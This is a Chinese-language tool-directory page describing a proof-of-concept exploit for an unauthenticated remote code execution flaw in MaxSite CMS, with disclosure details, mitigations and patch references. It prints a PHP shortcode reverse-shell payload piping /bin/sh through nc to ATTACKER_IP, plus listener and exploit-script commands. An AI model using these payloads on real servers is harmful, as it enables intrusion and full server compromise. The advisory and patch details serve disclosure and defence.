Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — MaxSite CMS <= 109.1 中通过 MarkItUp 编辑器 AJAX 端点实现未认证远程代码执行的概念验证漏洞利用,包含检测与反向 Shell 载荷。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

MaxSite CMS <= 109.1 中通过 MarkItUp 编辑器 AJAX 端点实现未认证远程代码执行的概念验证漏洞利用,包含检测与反向 Shell 载荷。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
546个月前尚未审核
分享

CVE‑2026‑3395 — MaxSite CMS 未认证远程代码执行

Author Country Instagram GitHub CVE Exploit Type CVSS

概述

MaxSite CMS ≤ 109.1 中存在**未认证远程代码执行(RCE)**漏洞。

该缺陷源于 MarkItUp 编辑器插件 AJAX 端点中薄弱的授权检查,以及 run_php 插件对用户提供的 PHP 代码的不安全执行。

  • 发现/修复时间: 2026 年 3 月
  • 修复版本: MaxSite CMS 109.2
  • 厂商: MaxSite CMS
  • 仓库: maxsite/cms

描述

该漏洞影响 MarkItUp 编辑器插件中的以下文件:

  • preview-ajax.php
  • autosave-post-ajax.php

这些端点:

  • 无需认证即可访问
  • 仅执行薄弱的 referrer 验证(极易绕过)
  • 将用户输入传递给 run_php 插件
  • 使用 eval() 执行 [php]...[/php] 短代码

攻击者可以向 /ajax/ 路由发送精心构造的 POST 请求,通过 data 参数携带 Base64 编码的内部路径和恶意 PHP 载荷,从而导致:

🚨 完全未认证远程代码执行


攻击流程图

root@kitploit:~
graph TD
    A["攻击者"] -->|"恶意 POST 请求"| B["AJAX 端点"]
    B -->|"Referer 伪造"| C["preview-ajax.php"]
    C -->|"未净化输入"| D["run_php 插件"]
    D -->|"eval() 执行"| E["任意 PHP 执行"]
    E -->|"命令执行"| F["服务器被攻陷"]

前提条件

  • MaxSite CMS 版本 ≤ 109.1
  • 已启用 run_php 插件(常见默认配置)
  • PHP 配置允许使用 eval()

漏洞利用

包含一个 Python 3 概念验证漏洞利用脚本(exploit.py)。

检测载荷(非破坏性)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

反弹 Shell 载荷

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

使用方法

1. 启动监听器

root@kitploit:~
nc -lvnp 9001

2. 运行漏洞利用脚本

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

缓解措施

立即行动

  • 升级至 MaxSite CMS 109.2 或更高版本
  • 如非必要,禁用 run_php 插件

手动修补

在易受攻击的文件中添加认证检查:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

参考资料

  • 补丁提交 https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • 漏洞条目 https://vuldb.com/?id.348281

  • NVD 记录 https://nvd.nist.gov/vuln/detail/CVE-2026-3395


法律声明

本项目仅用于:

  • 安全研究
  • 教育目的
  • 经授权的渗透测试

⚠️ 请勿在未经明确许可的情况下对系统使用本工具。

作者对滥用或造成的损害不承担任何责任。


作者

Mohammed Idrees Banyamer 约旦 🇯🇴 安全研究员

banyamer_security — Silent Hunter • Shadow Presence

2026 年 3 月

下载工具